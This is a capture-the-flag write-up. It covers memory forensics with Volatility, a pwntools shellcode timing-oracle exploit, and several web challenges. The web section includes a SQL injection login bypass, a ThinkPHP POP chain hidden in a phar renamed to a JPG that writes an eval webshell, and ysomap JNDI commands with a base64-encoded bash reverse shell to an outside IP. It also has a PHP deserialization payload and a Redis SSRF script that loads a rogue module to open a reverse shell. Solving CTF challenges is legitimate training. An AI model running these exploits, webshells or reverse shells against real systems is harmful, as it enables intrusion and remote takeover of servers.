Misc
Sign-in (check-in challenge)
Group announcement
FLAG
flag{e7gRR32wJJcHwQjwc2k9qFZ6fvn3gZ8P}
Browser
Task 1: identify the default browser and give the registry value that proves it (e.g. IE.HTTP).
The answer lives in the registry, so it has to be found by patiently walking the hives in the memory image.
# Enumerate the registry hives present in the memory image (virtual/physical
# address plus hive path) so the right one can be addressed by offset.
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist
# NOTE(review): as written this repeats hivelist with -o, which hivelist does
# not take; the intent is presumably to walk the hive found above
# (printkey -o <hive-vaddr> -K "<key>" or hivedump -o <hive-vaddr>) -- confirm.
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 hivelist -o 0x8f484880
http://www.360doc.com/content/14/0216/23/13813789_353089973.shtml
Take the virtual address of the relevant hive from the hivelist output and pass it with -o.
Then look up the Win7 registry key that records the user's chosen HTTP handler:
"Software\Microsoft\windows\Shell\Associations\UrlAssociations\http\Userchoice"
# Dump the file object at physical offset 0x7da2abf0 into the current
# directory. -Q takes a FILE_OBJECT physical address (normally read off the
# filescan output); the dumped file is the one opened in Navicat below.
./volatility -f /root/CTF/Browser.raw --profile=Win7SP1x86 dumpfiles -Q 0x000000007da2abf0 -D ./
Download the dumped file and open it in Navicat (it is presumably the browser's history database).
Sort the table in descending order and the most recent entry is:
https://weibo.com/login.php
Concatenate the three pieces (browser ProgId, version, URL) with underscores:
MSEdgeHTM_92.0.902.78_https://weibo.com/login.php
Get flag
Pwn
ezshell
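from pwn import *
import time

# Remote target; uncomment the process() line in probe() for local testing.
BINARY = './chall'
HOST = "47.104.169.149"
PORT = 25178

# The secret-code buffer is presumably mapped at 0x10000 by the challenge:
# every address the shellcode builds is 0x10000 + offset -- TODO confirm.
PATH_OFFSET = 0x40 - 6   # where b'./flag' lands inside the 0x40-byte payload
READ_OFFSET = 0x50       # scratch area the flag is read into
READ_LEN = 0x50

# Timing oracle: matching shellcode spins forever, non-matching returns at
# once, so a recv() that blocks longer than HANG_THRESHOLD means "match".
RECV_TIMEOUT = 2
HANG_THRESHOLD = 1.5

context.binary = BINARY
context.arch = 'amd64'


def build_shellcode(idx, c):
    """Assemble shellcode that answers "is flag[idx] == chr(c)?" via timing.

    Steps: open("./flag") (retrying until the fd is >= 4, as the original
    did -- why the low fds are unusable is not visible here), read 0x50
    bytes into the scratch buffer, then compare byte idx with c. On a match
    it loops on the cmp forever; otherwise it executes ret (and dies).

    The spin loop uses a label instead of the original ``jz $-3`` /
    ``jz $-4`` byte-offset guess, which depended on the encoded cmp size.
    """
    sc = f'''
    push {PATH_OFFSET:#x}; pop rdi
    xor rbx, rbx; inc bl; shl rbx, 0x10
    add rdi, rbx
    xor esi, esi
    open:
    push 2; pop rax; syscall
    cmp al, 0x4
    jl open
    mov rdi, rax
    xor eax, eax
    push {READ_LEN:#x}; pop rdx
    push {READ_OFFSET:#x}; pop rsi
    add rsi, rbx
    syscall
    spin:
    cmp byte ptr [rsi + {idx}], {c}
    jz spin
    ret
    '''
    return asm(sc)


def pwn(p, idx, c):
    """Send the probe for (idx, c) on an already-open tube p.

    Raises ValueError if the shellcode would overrun the slot reserved for
    the "./flag" path, which would silently shift the path and break the
    open() above.
    """
    sc = build_shellcode(idx, c)
    if len(sc) > PATH_OFFSET:
        raise ValueError(f"shellcode is {len(sc)} bytes, max {PATH_OFFSET}")
    payload = sc.ljust(PATH_OFFSET, b'a') + b'./flag'
    p.recvuntil(b'======== Input your secret code ========\n')
    p.send(payload)


def probe(idx, c):
    """Return True if the target hangs for (idx, c), i.e. flag[idx] == chr(c)."""
    p = remote(HOST, PORT)
    # p = process(BINARY)
    try:
        pwn(p, idx, c)
        start = time.time()
        try:
            p.recv(timeout=RECV_TIMEOUT)
        except EOFError:
            # A non-matching byte makes the process ret into garbage and die;
            # the closed connection is the expected "no match" outcome.
            pass
        elapsed = time.time() - start
    finally:
        p.close()
    return elapsed > HANG_THRESHOLD


def leak_flag():
    """Recover the flag one printable byte at a time.

    Stops at the first position where no byte in 32..126 produces a hang
    (presumably the end of the flag). Each step costs one connection per
    candidate byte, so a flaky network can yield a false negative.
    """
    found = []
    idx = 0
    while True:
        for c in range(32, 127):
            if probe(idx, c):
                found.append(c)
                print("".join(map(chr, found)))
                break
        else:
            break
        idx += 1
    return "".join(map(chr, found))


if __name__ == "__main__":
    print(leak_flag())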
Web
eztp
Source code disclosed through a www.zip backup left in the web root.
POST /public/ HTTP/1.1 Host: 8.134.37.86:26846 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 100 Origin: http://8.134.37.86:26846 Connection: close Referer: http://8.134.37.86:26846/public/index.php Cookie: PHPSESSID=7la556p4v160a8j1nhcholth1d username[0]=not like&username[1][0]=%%&username[1][1]=233&username[2]=) union select 1,1#&password=1
SQL-inject the login to reach the admin backend. The username is sent as an array, which presumably reaches the framework's where() builder as an operator/value tuple ['not like', ['%%', 233], ') union select 1,1#']; the third element is interpolated into the query unescaped, so the UNION makes the credential check succeed.
POP chain
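<?php
/*
 * POP chain for the eztp challenge (ThinkPHP 5.1-style gadgets), packed into
 * a phar so that any filesystem call on a phar:// path unserializes its
 * metadata.
 *
 * NOTE(review): the framework classes are not in this file; the class and
 * property layout below mirrors the public ThinkPHP 5.1 chain
 * (process\pipes\Windows::__destruct -> model\Pivot::__toString -> ...
 * -> console\Output -> session\driver\Memcached -> cache\driver\File write).
 * Property names and visibility (public/protected/private) must stay exactly
 * as declared: they determine the serialized form the target unserializes.
 *
 * Fix vs. the original listing: the 'path' option was split by two stray
 * spaces ("base64- decode", "../ ../"); it has to be one unbroken literal.
 */

namespace think {
    abstract class Model
    {
        protected $append;
        protected $error;
        public $parent;
    }
}

namespace think\model {
    use think\Model;
    use think\model\relation\HasOne;
    use think\console\Output;

    abstract class Relation
    {
        protected $query;
        protected $selfRelation;
        protected $parent;
        protected $foreignKey;
        protected $localKey;
    }

    class Pivot extends Model
    {
        public function __construct()
        {
            // 'mb' => 'getError': the appended attribute is presumably
            // resolved by calling getError(), which hands back $this->error
            // (the HasOne gadget) -- per the public chain, confirm.
            $this->append = ['mb' => 'getError'];
            $this->error  = new HasOne();
            $this->parent = new Output();
        }
    }
}

namespace think\session\driver {
    use think\cache\driver\File;

    class Memcached
    {
        protected $handler;

        public function __construct()
        {
            // Session writes are forwarded to the File cache driver below.
            $this->handler = new File();
        }
    }
}

namespace think\cache\driver {
    class File
    {
        protected $options;
        protected $tag;

        function __construct()
        {
            // 'path' is where the cache driver writes. It is a php://filter
            // write target: the base64 blob in the resource decodes to
            //   <?php @eval($_POST['ccc']); followed by a closing PHP tag
            // and the utf-8->utf7 iconv + base64-decode filters are what
            // make that land as a clean webshell at
            // /var/www/html/public/uploads/a.php (mechanism per public
            // ThinkPHP 5.1 write-ups -- TODO confirm against the framework).
            $this->options = [
                'expire'        => 3600,
                'cache_subdir'  => false,
                'prefix'        => '',
                'path'          => 'php://filter/convert.iconv.utf-8.utf7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../../../../../../../../var/www/html/public/uploads/a.php',
                'data_compress' => false,
            ];
            $this->tag = 1;
        }
    }
}

namespace think\db {
    use think\console\Output;

    // Kept from the original listing; nothing in this chain instantiates it.
    class Query
    {
        protected $model;

        public function __construct()
        {
            $this->model = new Output();
        }
    }
}

namespace think\console {
    use think\session\driver\Memcached;

    class Output
    {
        protected $styles;
        private $handle;

        public function __construct()
        {
            // Presumably: an undefined method call on Output goes through
            // __call, 'where' is accepted as a style, and the message ends up
            // written to $handle (the session driver) -- confirm.
            $this->styles = ['where'];
            $this->handle = new Memcached();
        }
    }
}

namespace think\model\relation {
    use think\model\Relation;
    use think\console\Output;

    abstract class OneToOne extends Relation
    {
        protected $bindAttr;
    }

    class HasOne extends OneToOne
    {
        public function __construct()
        {
            $this->selfRelation = 0;
            // Method calls on the "query" object hit Output (see above).
            $this->query        = new Output();
            $this->bindAttr     = ['ccc', 'ccc'];
            $this->foreignKey   = 'ccc';
            $o = new \stdClass();
            $o->mb = 'ccc';
            $this->parent   = $o;
            $this->localKey = 'mb';
        }
    }
}

namespace think\process\pipes {
    use think\model\Pivot;

    class Windows
    {
        private $files;

        public function __construct()
        {
            // Chain entry point: Windows::__destruct iterates $files and the
            // file_exists() on a Pivot object triggers its __toString
            // (per the public chain -- confirm).
            $this->files = [new Pivot()];
        }
    }
}

namespace {
    use think\process\pipes\Windows;

    // Plain-unserialize variant of the same payload:
    // echo urlencode(base64_encode(serialize(new Windows())));

    $phar = new Phar("exp.phar");   // extension must be .phar while building
    $phar->startBuffering();
    // GIF magic so the upload passes an image check; the stub then halts PHP.
    $phar->setStub('GIF89a' . '<?php __HALT_COMPILER();?>');
    $phar->setMetadata(new Windows()); // the metadata is what gets unserialized
    $phar->addFromString("1.php", ""); // any file entry will do
    $phar->stopBuffering();            // signature is computed here
    rename("exp.phar", "exp.jpg");     // upload it as an image
}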
Upload the phar (renamed exp.jpg) through the image upload.
Then trigger the deserialization through the listpic route: its dir parameter presumably reaches a filesystem function, and a phar:// path makes PHP unserialize the archive's metadata:
http://8.134.37.86:24954/public/?s=admin/index/listpic&dir=phar:///var/www/html/public/static/img/person.jpg
With a.php written, use the webshell (POST parameter ccc) to read the flag.
jackson
Use Peanut Shell (a port-forwarding / intranet-penetration service) to expose a malicious LDAP server on the public internet for the JNDI callback.
ysomap console commands (the base64 is `bash -i >& /dev/tcp/101.32.201.44/9999 0>&1`; the echo|base64|bash form avoids spaces in the Runtime.exec argument):
use exploit LDAPLocalChainListener
use payload CommonsCollections8
use bullet TransformerBullet
set lport 9001
set version 3
set args 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzIuMjAxLjQ0Lzk5OTkgMD4mMQ==}|{base64,-d}|{bash,-i}'
run
ysomap serves the payload configured above.
Send the JNDI reference to the server and catch the reverse shell.
easy_eval
Deserialization
<?php
// Gadget pair for the easy_eval unserialize sink. Property names, order and
// visibility must stay exactly as declared: they define the serialized payload
// the target unserializes.
class a{
    // Code to be run by the target's class a; the default is always replaced
    // by the constructor argument.
    public $code = "system('cat /*;id');";
    function __construct($code) {
        $this->code = $code;
    }
}
class b{
    function __construct($code) {
        // $a is a dynamic (undeclared) property; it still serializes as 'a'.
        $this->a = new a($code);
    }
    // On destruction the target calls a() on the inner object. a::a() does not
    // exist in this file; presumably the target's class a has a __call (or
    // similar) that evaluates $code -- TODO confirm against the challenge source.
    function __destruct(){
        echo $this->a->a();
    }
}
// The payload evaluates arbitrary PHP supplied as request parameter 0.
$c = new b('eval($_REQUEST[0]);');
echo serialize($c);
Upload the Redis module (exp.so) to /tmp through the webshell.
Then use fsockopen from the webshell as an SSRF primitive to talk to the local Redis, which speaks a plain-text protocol:
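<?php
/**
 * Minimal raw-socket client used to reach the local Redis from the web host
 * (SSRF via fsockopen). Redis accepts inline commands, so the request body is
 * written to the socket as-is.
 *
 * @param string     $host target host
 * @param int|string $port target port (cast with intval)
 * @param string     $link raw bytes to send (CRLF-separated Redis commands)
 * @return string|null everything the server sent back until it closed the
 *                     connection, or null (after printing the error) when the
 *                     connection could not be opened
 */
function Getfile($host, $port, $link)
{
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr (error number $errno) \n";
        return null;
    }
    fwrite($fp, $link);
    // Fix: the original initialised $content but appended to $contents.
    $contents = '';
    // Reads until the server closes the socket, hence the trailing 'quit'.
    while (!feof($fp)) {
        $contents .= fgets($fp, 1024);
    }
    fclose($fp);
    return $contents;
}

// Redis password presumably taken from the disclosed challenge config (not
// shown here).
$poc  = "AUTH you_cannot_guess_it\r\n";
// Load the module uploaded to /tmp and have it open a reverse shell to the
// attacker host; system.rev is presumably the command exposed by the
// redis-rogue-server exp.so -- adjust if a different module is used.
$poc .= "module load /tmp/exp.so\r\nsystem.rev 121.196.165.115 6663\r\n";
// 'quit' makes the server close the connection so the feof() loop ends.
$poc .= "info\r\nquit\r\n";
var_dump($poc);
var_dump(Getfile("127.0.0.1", "6379", $poc));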